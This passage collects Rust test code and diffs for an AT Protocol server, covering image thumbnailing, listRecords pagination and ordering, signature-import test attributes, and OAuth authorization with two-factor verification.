// Thumbnails keep the source aspect ratio (within rounding tolerance) for
// both orientations, and MIME sniffing falls back to the actual bytes.
#[test]
fn test_aspect_ratio_preserved_landscape() {
    let processor = ImageProcessor::new();
    let data = create_test_png(1600, 800);
    let result = processor.process(&data, "image/png").unwrap();
    let thumb = result.thumbnail_full.expect("Should have thumbnail");
    let original_ratio = 1600.0 / 800.0;
    let thumb_ratio = thumb.width as f64 / thumb.height as f64;
    assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
}
#[test]
fn test_aspect_ratio_preserved_portrait() {
    let processor = ImageProcessor::new();
    let data = create_test_png(800, 1600);
    let result = processor.process(&data, "image/png").unwrap();
    let thumb = result.thumbnail_full.expect("Should have thumbnail");
    let original_ratio = 800.0 / 1600.0;
    let thumb_ratio = thumb.width as f64 / thumb.height as f64;
    assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
}
// A generic MIME type must not prevent decoding a recognizable PNG.
#[test]
fn test_mime_type_detection_auto() {
    let processor = ImageProcessor::new();
    let data = create_test_png(100, 100);
    let result = processor.process(&data, "application/octet-stream");
    assert!(result.is_ok(), "Should detect PNG format from data");
}
// MIME allow-list is case-insensitive; EXIF stripping yields non-empty
// output; thumbnails can be disabled entirely.
#[test]
fn test_is_supported_mime_type() {
    assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
    assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
    assert!(ImageProcessor::is_supported_mime_type("image/png"));
    assert!(ImageProcessor::is_supported_mime_type("image/gif"));
    assert!(ImageProcessor::is_supported_mime_type("image/webp"));
    assert!(ImageProcessor::is_supported_mime_type("IMAGE/PNG"));
    assert!(ImageProcessor::is_supported_mime_type("Image/Jpeg"));
    assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
    assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
    assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
    assert!(!ImageProcessor::is_supported_mime_type("application/json"));
}
#[test]
fn test_strip_exif() {
    let data = create_test_jpeg(100, 100);
    let result = ImageProcessor::strip_exif(&data);
    assert!(result.is_ok());
    let stripped = result.unwrap();
    assert!(!stripped.is_empty());
}
#[test]
fn test_with_thumbnails_disabled() {
    let processor = ImageProcessor::new().with_thumbnails(false);
    let data = create_test_png(2000, 2000);
    let result = processor.process(&data, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
    assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
}
// Builder chaining, output-struct invariants, and the medium-size tier
// (feed thumbnail only).
#[test]
fn test_builder_chaining() {
    let processor = ImageProcessor::new()
        .with_max_dimension(2048)
        .with_max_file_size(5 * 1024 * 1024)
        .with_output_format(OutputFormat::Jpeg)
        .with_thumbnails(true);
    let data = create_test_png(500, 500);
    let result = processor.process(&data, "image/png").unwrap();
    assert_eq!(result.original.mime_type, "image/jpeg");
}
#[test]
fn test_processed_image_fields() {
    let processor = ImageProcessor::new();
    let data = create_test_png(500, 500);
    let result = processor.process(&data, "image/png").unwrap();
    assert!(!result.original.data.is_empty());
    assert!(!result.original.mime_type.is_empty());
    assert!(result.original.width > 0);
    assert!(result.original.height > 0);
}
#[test]
fn test_only_feed_thumbnail_for_medium_images() {
    let processor = ImageProcessor::new();
    let data = create_test_png(500, 500);
    let result = processor.process(&data, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
    assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
}
// Large-image tier and exact-threshold boundaries: a dimension exactly at
// the tier size gets no thumbnail; one pixel over does.
#[test]
fn test_both_thumbnails_for_large_images() {
    let processor = ImageProcessor::new();
    let data = create_test_png(2000, 2000);
    let result = processor.process(&data, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
    assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
}
#[test]
fn test_exact_threshold_boundary_feed() {
    let processor = ImageProcessor::new();
    let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
    let result = processor.process(&at_threshold, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_none(), "Exact threshold should not generate thumbnail");
    let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
    let result = processor.process(&above_threshold, "image/png").unwrap();
    assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
}
#[test]
fn test_exact_threshold_boundary_full() {
    let processor = ImageProcessor::new();
    let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
    let result = processor.process(&at_threshold, "image/png").unwrap();
    assert!(result.thumbnail_full.is_none(), "Exact threshold should not generate thumbnail");
    let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
    let result = processor.process(&above_threshold, "image/png").unwrap();
    assert!(result.thumbnail_full.is_some(), "Above threshold should generate thumbnail");
}

View File

@@ -217,6 +217,7 @@ async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"]
async fn test_import_with_valid_signature_and_mock_plc() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -266,6 +267,7 @@ async fn test_import_with_valid_signature_and_mock_plc() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"]
async fn test_import_with_wrong_signing_key_fails() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -322,6 +324,7 @@ async fn test_import_with_wrong_signing_key_fails() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"]
async fn test_import_with_did_mismatch_fails() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -373,6 +376,7 @@ async fn test_import_with_did_mismatch_fails() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"]
async fn test_import_with_plc_resolution_failure() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
@@ -424,6 +428,7 @@ async fn test_import_with_plc_resolution_failure() {
}
#[tokio::test]
#[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"]
async fn test_import_with_no_signing_key_in_did_doc() {
let client = client();
let (token, did) = create_account_and_login(&client).await;

View File

@@ -0,0 +1,554 @@
mod common;
mod helpers;
use common::*;
use helpers::*;
use chrono::Utc;
use reqwest::StatusCode;
use serde_json::{Value, json};
use std::time::Duration;
/// Creates a post via `com.atproto.repo.putRecord` with an explicit rkey and
/// returns the `(uri, cid)` of the written record. Panics (failing the test)
/// if the request does not return 200 OK.
async fn create_post_with_rkey(
    client: &reqwest::Client,
    did: &str,
    jwt: &str,
    rkey: &str,
    text: &str,
) -> (String, String) {
    let record_payload = json!({
        "repo": did,
        "collection": "app.bsky.feed.post",
        "rkey": rkey,
        "record": {
            "$type": "app.bsky.feed.post",
            "text": text,
            "createdAt": Utc::now().to_rfc3339()
        }
    });
    let endpoint = format!(
        "{}/xrpc/com.atproto.repo.putRecord",
        base_url().await
    );
    let res = client
        .post(endpoint)
        .bearer_auth(jwt)
        .json(&record_payload)
        .send()
        .await
        .expect("Failed to create record");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let uri = body["uri"].as_str().unwrap().to_string();
    let cid = body["cid"].as_str().unwrap().to_string();
    (uri, cid)
}
// listRecords ordering: the default is newest-first (DESC by rkey here,
// since rkeys were chosen in creation order); reverse=true flips to ASC.
#[tokio::test]
async fn test_list_records_default_order() {
    let client = client();
    let (did, jwt) = setup_new_user("list-default-order").await;
    create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
    tokio::time::sleep(Duration::from_millis(50)).await;
    create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
    tokio::time::sleep(Duration::from_millis(50)).await;
    create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    assert_eq!(records.len(), 3);
    let rkeys: Vec<&str> = records
        .iter()
        .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
        .collect();
    assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
}
#[tokio::test]
async fn test_list_records_reverse_true() {
    let client = client();
    let (did, jwt) = setup_new_user("list-reverse").await;
    create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await;
    tokio::time::sleep(Duration::from_millis(50)).await;
    create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await;
    tokio::time::sleep(Duration::from_millis(50)).await;
    create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await;
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("reverse", "true"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    let rkeys: Vec<&str> = records
        .iter()
        .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
        .collect();
    assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
}
// Cursor pagination: two pages of limit=2 over 5 records must not overlap.
#[tokio::test]
async fn test_list_records_cursor_pagination() {
    let client = client();
    let (did, jwt) = setup_new_user("list-cursor").await;
    for i in 0..5 {
        create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
        tokio::time::sleep(Duration::from_millis(50)).await;
    }
    // Page 1: first two records plus a cursor.
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "2"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    assert_eq!(records.len(), 2);
    let cursor = body["cursor"].as_str().expect("Should have cursor with more records");
    // Page 2: resume from the cursor.
    let res2 = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "2"),
            ("cursor", cursor),
        ])
        .send()
        .await
        .expect("Failed to list records with cursor");
    assert_eq!(res2.status(), StatusCode::OK);
    let body2: Value = res2.json().await.unwrap();
    let records2 = body2["records"].as_array().unwrap();
    assert_eq!(records2.len(), 2);
    // No URI may appear on both pages.
    let all_uris: Vec<&str> = records
        .iter()
        .chain(records2.iter())
        .map(|r| r["uri"].as_str().unwrap())
        .collect();
    let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
    assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
}
/// `rkeyStart` must act as a lower bound: no returned rkey may sort below it.
#[tokio::test]
async fn test_list_records_rkey_start() {
    let http = client();
    let (did, jwt) = setup_new_user("list-rkey-start").await;
    for (rkey, text) in [("aaaa", "First"), ("bbbb", "Second"), ("cccc", "Third"), ("dddd", "Fourth")] {
        create_post_with_rkey(&http, &did, &jwt, rkey, text).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("rkeyStart", "bbbb"),
            ("reverse", "true"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    for record in body["records"].as_array().unwrap() {
        // The rkey is the final path segment of the at:// URI.
        let rkey = record["uri"].as_str().unwrap().rsplit('/').next().unwrap();
        assert!(rkey >= "bbbb", "rkeyStart should filter records >= start");
    }
}
/// `rkeyEnd` must act as an upper bound: no returned rkey may sort above it.
#[tokio::test]
async fn test_list_records_rkey_end() {
    let http = client();
    let (did, jwt) = setup_new_user("list-rkey-end").await;
    for (rkey, text) in [("aaaa", "First"), ("bbbb", "Second"), ("cccc", "Third"), ("dddd", "Fourth")] {
        create_post_with_rkey(&http, &did, &jwt, rkey, text).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("rkeyEnd", "cccc"),
            ("reverse", "true"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    for record in body["records"].as_array().unwrap() {
        // The rkey is the final path segment of the at:// URI.
        let rkey = record["uri"].as_str().unwrap().rsplit('/').next().unwrap();
        assert!(rkey <= "cccc", "rkeyEnd should filter records <= end");
    }
}
/// Combining `rkeyStart` and `rkeyEnd` yields an inclusive range; records
/// outside [bbbb, dddd] must be excluded and the range must not be empty.
#[tokio::test]
async fn test_list_records_rkey_range() {
    let http = client();
    let (did, jwt) = setup_new_user("list-rkey-range").await;
    for (rkey, text) in [
        ("aaaa", "First"),
        ("bbbb", "Second"),
        ("cccc", "Third"),
        ("dddd", "Fourth"),
        ("eeee", "Fifth"),
    ] {
        create_post_with_rkey(&http, &did, &jwt, rkey, text).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("rkeyStart", "bbbb"),
            ("rkeyEnd", "dddd"),
            ("reverse", "true"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    assert!(!records.is_empty(), "Should have at least some records in range");
    for record in records {
        let rkey = record["uri"].as_str().unwrap().rsplit('/').next().unwrap();
        assert!(rkey >= "bbbb" && rkey <= "dddd", "Range should be inclusive, got {}", rkey);
    }
}
/// A `limit` far above the documented maximum must be clamped server-side to
/// at most 100 records per page.
#[tokio::test]
async fn test_list_records_limit_clamping_max() {
    let http = client();
    let (did, jwt) = setup_new_user("list-limit-max").await;
    for i in 0..5 {
        create_post_with_rkey(&http, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "1000"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let page_len = body["records"].as_array().unwrap().len();
    assert!(page_len <= 100, "Limit should be clamped to max 100");
}
/// `limit=0` must be clamped up so at least one record is returned.
#[tokio::test]
async fn test_list_records_limit_clamping_min() {
    let http = client();
    let (did, jwt) = setup_new_user("list-limit-min").await;
    create_post_with_rkey(&http, &did, &jwt, "aaaa", "Post").await;
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "0"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    assert!(
        !body["records"].as_array().unwrap().is_empty(),
        "Limit should be clamped to min 1"
    );
}
/// Listing a collection with no records must return an empty array and no cursor.
#[tokio::test]
async fn test_list_records_empty_collection() {
    let http = client();
    let (did, _jwt) = setup_new_user("list-empty").await;
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[("repo", did.as_str()), ("collection", "app.bsky.feed.post")])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    assert!(
        body["records"].as_array().unwrap().is_empty(),
        "Empty collection should return empty array"
    );
    assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
}
/// With more records than the requested page size, exactly `limit` records
/// come back.
#[tokio::test]
async fn test_list_records_exact_limit() {
    let http = client();
    let (did, jwt) = setup_new_user("list-exact-limit").await;
    for i in 0..10 {
        create_post_with_rkey(&http, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "5"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let page_len = body["records"].as_array().unwrap().len();
    assert_eq!(page_len, 5, "Should return exactly 5 records when limit=5");
}
/// When the page size exceeds the record count, all records come back in a
/// single page.
#[tokio::test]
async fn test_list_records_cursor_exhaustion() {
    let http = client();
    let (did, jwt) = setup_new_user("list-cursor-exhaust").await;
    for i in 0..3 {
        create_post_with_rkey(&http, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
    }
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "10"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    assert_eq!(body["records"].as_array().unwrap().len(), 3);
}
/// Listing records for an unknown DID must return 404 Not Found.
#[tokio::test]
async fn test_list_records_repo_not_found() {
    let http = client();
    let res = http
        .get(format!("{}/xrpc/com.atproto.repo.listRecords", base_url().await))
        .query(&[
            ("repo", "did:plc:nonexistent12345"),
            ("collection", "app.bsky.feed.post"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::NOT_FOUND);
}
/// Every listed record must carry a `uri`, a `cid`, and the record `value`.
///
/// Fix: the per-record assertion loop passed vacuously when `records` was
/// empty, so the test now first asserts that the created post is listed.
#[tokio::test]
async fn test_list_records_includes_cid() {
    let client = client();
    let (did, jwt) = setup_new_user("list-includes-cid").await;
    create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await;
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    // Guard against a vacuous pass: the loop below asserts nothing if empty.
    assert!(!records.is_empty(), "Created post should appear in listRecords");
    for record in records {
        assert!(record["uri"].is_string(), "Record should have uri");
        assert!(record["cid"].is_string(), "Record should have cid");
        assert!(record["value"].is_object(), "Record should have value");
        let cid = record["cid"].as_str().unwrap();
        // CIDv1 base32 strings for record blocks begin with "bafy".
        assert!(cid.starts_with("bafy"), "CID should be valid");
    }
}
/// With `reverse=true` and `limit=2` over five posts, the first page must be
/// the two oldest rkeys and the cursor must continue the ascending order.
///
/// Fix: the second page was previously guarded by `if let Some(cursor)`,
/// which silently skipped all second-page assertions when no cursor was
/// returned — exactly the failure this test should catch. Five records at
/// limit=2 guarantee a cursor, so its absence is now a hard failure, and the
/// second response's status is asserted too.
#[tokio::test]
async fn test_list_records_cursor_with_reverse() {
    let client = client();
    let (did, jwt) = setup_new_user("list-cursor-reverse").await;
    for i in 0..5 {
        create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await;
    }
    let res = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "2"),
            ("reverse", "true"),
        ])
        .send()
        .await
        .expect("Failed to list records");
    assert_eq!(res.status(), StatusCode::OK);
    let body: Value = res.json().await.unwrap();
    let records = body["records"].as_array().unwrap();
    let first_rkeys: Vec<&str> = records
        .iter()
        .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
        .collect();
    assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
    // 5 records at limit=2 means more pages remain, so a cursor is mandatory.
    let cursor = body["cursor"]
        .as_str()
        .expect("Should have cursor when more records remain");
    let res2 = client
        .get(format!(
            "{}/xrpc/com.atproto.repo.listRecords",
            base_url().await
        ))
        .query(&[
            ("repo", did.as_str()),
            ("collection", "app.bsky.feed.post"),
            ("limit", "2"),
            ("reverse", "true"),
            ("cursor", cursor),
        ])
        .send()
        .await
        .expect("Failed to list records with cursor");
    assert_eq!(res2.status(), StatusCode::OK);
    let body2: Value = res2.json().await.unwrap();
    let records2 = body2["records"].as_array().unwrap();
    let second_rkeys: Vec<&str> = records2
        .iter()
        .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
        .collect();
    assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
}

View File

@@ -323,6 +323,7 @@ async fn test_authorize_get_with_valid_request_uri() {
let auth_res = client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", request_uri)])
.send()
.await
@@ -344,6 +345,7 @@ async fn test_authorize_rejects_invalid_request_uri() {
let res = client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
.send()
.await
@@ -941,6 +943,7 @@ async fn test_wrong_credentials_denied() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),
@@ -1162,6 +1165,7 @@ async fn test_deactivated_account_cannot_authorize() {
let auth_res = http_client
.post(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.form(&[
("request_uri", request_uri),
("username", &handle),
@@ -1184,6 +1188,7 @@ async fn test_expired_authorization_request() {
let res = http_client
.get(format!("{}/oauth/authorize", url))
.header("Accept", "application/json")
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
.send()
.await
@@ -1477,3 +1482,631 @@ async fn test_state_with_special_chars() {
location
);
}
/// With 2FA enabled on the account, a correct username/password POST to
/// /oauth/authorize must NOT complete the grant directly: the server has to
/// redirect to the 2FA verification page and carry the pending `request_uri`.
#[tokio::test]
async fn test_2fa_required_when_enabled() {
    let url = base_url().await;
    let http_client = client();
    // Unique handle/email per run so repeated executions don't collide.
    let ts = Utc::now().timestamp_millis();
    let handle = format!("2fa-required-{}", ts);
    let email = format!("2fa-required-{}@example.com", ts);
    let password = "2fa-test-password";
    let create_res = http_client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", url))
        .json(&json!({
            "handle": handle,
            "email": email,
            "password": password
        }))
        .send()
        .await
        .unwrap();
    assert_eq!(create_res.status(), StatusCode::OK);
    let account: Value = create_res.json().await.unwrap();
    let user_did = account["did"].as_str().unwrap();
    // Flip the 2FA flag directly in the database — this test exercises the
    // authorize flow, not 2FA enrollment.
    let db_url = common::get_db_connection_string().await;
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(1)
        .connect(&db_url)
        .await
        .expect("Failed to connect to database");
    sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
        .bind(user_did)
        .execute(&pool)
        .await
        .expect("Failed to enable 2FA");
    // Pushed Authorization Request (PAR) with a PKCE S256 challenge; the
    // returned request_uri identifies the pending authorization.
    let redirect_uri = "https://example.com/2fa-callback";
    let mock_client = setup_mock_client_metadata(redirect_uri).await;
    let client_id = mock_client.uri();
    let (_, code_challenge) = generate_pkce();
    let par_body: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri = par_body["request_uri"].as_str().unwrap();
    // Use a non-redirect-following client so the 3xx Location can be inspected.
    let auth_client = no_redirect_client();
    let auth_res = auth_client
        .post(format!("{}/oauth/authorize", url))
        .form(&[
            ("request_uri", request_uri),
            ("username", &handle),
            ("password", password),
            ("remember_device", "false"),
        ])
        .send()
        .await
        .unwrap();
    // Correct credentials + 2FA enabled => redirect to the 2FA page, not the
    // client callback.
    assert!(
        auth_res.status().is_redirection(),
        "Should redirect to 2FA page, got status: {}",
        auth_res.status()
    );
    let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(
        location.contains("/oauth/authorize/2fa"),
        "Should redirect to 2FA page, got: {}",
        location
    );
    assert!(
        location.contains("request_uri="),
        "2FA redirect should include request_uri"
    );
}
/// After passing the password step, submitting a wrong 2FA code must re-render
/// the verification page (HTTP 200) with an error instead of issuing a code.
#[tokio::test]
async fn test_2fa_invalid_code_rejected() {
    let url = base_url().await;
    let http_client = client();
    // Unique handle/email per run so repeated executions don't collide.
    let ts = Utc::now().timestamp_millis();
    let handle = format!("2fa-invalid-{}", ts);
    let email = format!("2fa-invalid-{}@example.com", ts);
    let password = "2fa-test-password";
    let create_res = http_client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", url))
        .json(&json!({
            "handle": handle,
            "email": email,
            "password": password
        }))
        .send()
        .await
        .unwrap();
    assert_eq!(create_res.status(), StatusCode::OK);
    let account: Value = create_res.json().await.unwrap();
    let user_did = account["did"].as_str().unwrap();
    // Enable 2FA directly in the database (no enrollment step in this flow).
    let db_url = common::get_db_connection_string().await;
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(1)
        .connect(&db_url)
        .await
        .expect("Failed to connect to database");
    sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
        .bind(user_did)
        .execute(&pool)
        .await
        .expect("Failed to enable 2FA");
    // PAR + PKCE to obtain a pending request_uri for the authorization.
    let redirect_uri = "https://example.com/2fa-invalid-callback";
    let mock_client = setup_mock_client_metadata(redirect_uri).await;
    let client_id = mock_client.uri();
    let (_, code_challenge) = generate_pkce();
    let par_body: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri = par_body["request_uri"].as_str().unwrap();
    // Password step succeeds and redirects to the 2FA page.
    let auth_client = no_redirect_client();
    let auth_res = auth_client
        .post(format!("{}/oauth/authorize", url))
        .form(&[
            ("request_uri", request_uri),
            ("username", &handle),
            ("password", password),
            ("remember_device", "false"),
        ])
        .send()
        .await
        .unwrap();
    assert!(auth_res.status().is_redirection());
    let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
    assert!(location.contains("/oauth/authorize/2fa"));
    // Submit a deliberately wrong code; the page should come back with an
    // error body rather than a redirect to the client.
    let twofa_res = http_client
        .post(format!("{}/oauth/authorize/2fa", url))
        .form(&[
            ("request_uri", request_uri),
            ("code", "000000"),
        ])
        .send()
        .await
        .unwrap();
    assert_eq!(twofa_res.status(), StatusCode::OK);
    let body = twofa_res.text().await.unwrap();
    assert!(
        body.contains("Invalid verification code") || body.contains("invalid"),
        "Should show error for invalid code"
    );
}
/// Happy path: submitting the correct 2FA code completes the authorization —
/// the client is redirected back with an authorization code that exchanges
/// for a token whose subject is the 2FA-protected account.
#[tokio::test]
async fn test_2fa_valid_code_completes_auth() {
    let url = base_url().await;
    let http_client = client();
    // Unique handle/email per run so repeated executions don't collide.
    let ts = Utc::now().timestamp_millis();
    let handle = format!("2fa-valid-{}", ts);
    let email = format!("2fa-valid-{}@example.com", ts);
    let password = "2fa-test-password";
    let create_res = http_client
        .post(format!("{}/xrpc/com.atproto.server.createAccount", url))
        .json(&json!({
            "handle": handle,
            "email": email,
            "password": password
        }))
        .send()
        .await
        .unwrap();
    assert_eq!(create_res.status(), StatusCode::OK);
    let account: Value = create_res.json().await.unwrap();
    let user_did = account["did"].as_str().unwrap();
    // Enable 2FA directly in the database (no enrollment step in this flow).
    let db_url = common::get_db_connection_string().await;
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(1)
        .connect(&db_url)
        .await
        .expect("Failed to connect to database");
    sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
        .bind(user_did)
        .execute(&pool)
        .await
        .expect("Failed to enable 2FA");
    // PAR + PKCE; code_verifier is kept for the token exchange at the end.
    let redirect_uri = "https://example.com/2fa-valid-callback";
    let mock_client = setup_mock_client_metadata(redirect_uri).await;
    let client_id = mock_client.uri();
    let (code_verifier, code_challenge) = generate_pkce();
    let par_body: Value = http_client
        .post(format!("{}/oauth/par", url))
        .form(&[
            ("response_type", "code"),
            ("client_id", &client_id),
            ("redirect_uri", redirect_uri),
            ("code_challenge", &code_challenge),
            ("code_challenge_method", "S256"),
        ])
        .send()
        .await
        .unwrap()
        .json()
        .await
        .unwrap();
    let request_uri = par_body["request_uri"].as_str().unwrap();
    // Password step succeeds and redirects to the 2FA page.
